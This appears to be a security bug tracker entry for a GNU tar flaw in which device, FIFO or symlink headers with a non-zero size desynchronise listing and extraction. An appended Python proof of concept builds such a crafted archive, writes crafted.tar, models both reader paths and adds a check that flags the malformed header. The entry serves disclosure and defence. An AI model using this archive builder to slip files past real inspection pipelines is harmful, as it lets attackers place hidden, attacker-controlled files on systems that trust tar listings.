Bug 2455360 (CVE-2026-5704)

Summary: CVE-2026-5704 tar: tar: Hidden file injection via crafted archives
Product: [Other] Security Response
Reporter: OSIDB Bzimport <bzimport>
Component: vulnerability
Assignee: Product Security DevOps Team <prodsec-dev>
Status: NEW
QA Contact:
Severity: medium
Docs Contact:
Priority: medium
Version: unspecified
Keywords: Security
Target Milestone: ---
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version:
Doc Type: ---
Doc Text:
A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:

Description OSIDB Bzimport 2026-04-06 13:38:08 UTC
Summary:
GNU tar allows malformed archives where non-data-bearing typeflags (symlink, char device, block device, FIFO) contain a non-zero size field, leading to inconsistent behavior between listing (tar -t) and extraction (tar -x). This results in stream desynchronization and enables hidden file injection.

Requirements to exploit:
An attacker only needs the ability to supply a crafted tar archive to a target system that performs pre-extraction inspection using tar -t (or equivalent API) and later extracts it using GNU tar. No privileges or user interaction beyond extraction are required.

Patch Available: no

Version Fixed: N/A

Impact:
- Hidden file injection with fully attacker-controlled content
- Bypass of pre-extraction inspection mechanisms
- Single-implementation inconsistency (no cross-tool pipeline required)
- Attack complexity: Low (crafted archive is < 3 KB, no special privileges)
- Affected typeflags: '2', '3', '4', '6' (4 of 5 non-data typeflags)

Steps to reproduce if available:
1. Generate a crafted archive with a non-data-bearing typeflag (e.g., chardev) and a non-zero size.
2. List contents:
   tar -tf crafted.tar
   → injected file is NOT shown
3. Extract archive:
   tar -xf crafted.tar
4. Observe additional file created on disk that was not present in listing output.
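The steps above, as an added example that is not part of the bug report and not GNU tar's code: the script below builds the crafted archive in memory (a char-device header whose size field covers a complete regular-file member that follows it), then walks the bytes with two simplified reader models that follow the report's description of the two code paths (a listing path that skips `size` bytes after every header, and an extraction path that consumes no data for typeflags 2/3/4/6). It also shows what Python's own `tarfile` module sees, and ends with the pre-extraction check an inspection step should apply: reject any archive in which a non-data typeflag carries a non-zero size. The member names `dev` and `injected.txt`, the payload bytes and the device numbers are constructed for the example; the two walker models are assumptions about behaviour, not a transcription of tar's source.

```python
"""Model of the tar -t / tar -x desynchronisation described in this report.
Added example; not code from the report or from GNU tar.  Names, payload and
device numbers are made up; the reader models follow the report's wording."""
import io
import tarfile

BLOCK = 512
AFFECTED = {"2", "3", "4", "6"}      # symlink, chardev, blockdev, FIFO (per the report)
INJECTED_NAME = "injected.txt"      # constructed name for the hidden member
INJECTED_DATA = b"attacker-controlled content\n"   # constructed payload


def _octal(n, width):
    """Zero-padded, NUL-terminated octal field of `width` bytes (ustar style)."""
    return f"{n:0{width - 1}o}".encode() + b"\0"


def _blocks(n):
    """Length of `n` bytes of member data rounded up to whole 512-byte blocks."""
    return -(-n // BLOCK) * BLOCK


def ustar_header(name, typeflag, size, mode=0o644, devmajor=0, devminor=0):
    """Build one 512-byte ustar header with a valid checksum."""
    h = bytearray(BLOCK)
    h[0:100] = name.encode().ljust(100, b"\0")
    h[100:108] = _octal(mode, 8)
    h[108:116] = _octal(0, 8)         # uid
    h[116:124] = _octal(0, 8)         # gid
    h[124:136] = _octal(size, 12)     # the field the report says is not validated
    h[136:148] = _octal(0, 12)        # mtime
    h[148:156] = b" " * 8             # checksum is computed with spaces here
    h[156] = ord(typeflag)
    h[257:263] = b"ustar\0"
    h[263:265] = b"00"
    h[265:297] = b"root".ljust(32, b"\0")
    h[297:329] = b"root".ljust(32, b"\0")
    h[329:337] = _octal(devmajor, 8)
    h[337:345] = _octal(devminor, 8)
    h[148:156] = f"{sum(h):06o}".encode() + b"\0 "
    return bytes(h)


def build_archive(hide=True):
    """Char-device entry followed by a regular-file member.  With hide=True the
    device header's size field covers the whole regular-file member, so a reader
    that trusts the size field skips straight past it."""
    member = ustar_header(INJECTED_NAME, "0", len(INJECTED_DATA))
    member += INJECTED_DATA.ljust(_blocks(len(INJECTED_DATA)), b"\0")
    dev = ustar_header("dev", "3", len(member) if hide else 0,
                       mode=0o600, devmajor=1, devminor=3)
    return dev + member + bytes(2 * BLOCK)       # two zero blocks end the archive


def _parse(hdr):
    """Return (name, typeflag, size) after verifying the header checksum."""
    stored = int(hdr[148:156].split(b"\0", 1)[0].strip() or b"0", 8)
    if stored != sum(hdr[:148]) + 8 * 0x20 + sum(hdr[156:]):
        raise ValueError("bad ustar header checksum")
    name = hdr[0:100].split(b"\0", 1)[0].decode()
    typeflag = chr(hdr[156]) if hdr[156] else "0"
    size = int(hdr[124:136].split(b"\0", 1)[0].strip() or b"0", 8)
    return name, typeflag, size


def members(archive, trust_size_field):
    """Yield (name, typeflag, size) for every header a reader encounters.
    trust_size_field=True models the listing path (skip `size` bytes after every
    header); False models the extraction path, which consumes no data for the
    affected typeflags and therefore reads the very next block as a header."""
    off = 0
    while off + BLOCK <= len(archive):
        hdr = archive[off:off + BLOCK]
        if hdr == bytes(BLOCK):                  # end-of-archive marker
            return
        name, typeflag, size = _parse(hdr)
        yield name, typeflag, size
        off += BLOCK
        if trust_size_field or typeflag not in AFFECTED:
            off += _blocks(size)


def listing_names(archive):
    return [m[0] for m in members(archive, trust_size_field=True)]


def extraction_names(archive):
    return [m[0] for m in members(archive, trust_size_field=False)]


def tarfile_names(archive):
    """What Python's tarfile reports; it does not skip data for device entries."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
        return tf.getnames()


def inconsistent_size_members(archive):
    """Pre-extraction check: an affected typeflag with a non-zero size field is
    malformed, and the archive should be rejected before anything is extracted."""
    return [m for m in members(archive, trust_size_field=False)
            if m[1] in AFFECTED and m[2] != 0]


if __name__ == "__main__":
    crafted = build_archive()
    with open("crafted.tar", "wb") as f:      # feed this to tar -tf / tar -xf
        f.write(crafted)
    print("listing model   :", listing_names(crafted))
    print("extraction model:", extraction_names(crafted))
    print("python tarfile  :", tarfile_names(crafted))
    print("flagged         :", inconsistent_size_members(crafted))
```

Running the script writes crafted.tar (2,560 bytes, within the "< 3 KB" the report quotes) to the current directory; compare `tar -tf crafted.tar` against `tar -xf crafted.tar` in a scratch directory on the tar build under test, since the script only models the two paths and does not prove what a given build does. The last function is the check an inspection pipeline should run instead of trusting listing output: it walks the headers without trusting the size field and flags the malformed entry directly, so it also passes a well-formed archive (`build_archive(hide=False)`) in which the same device node has a zero size.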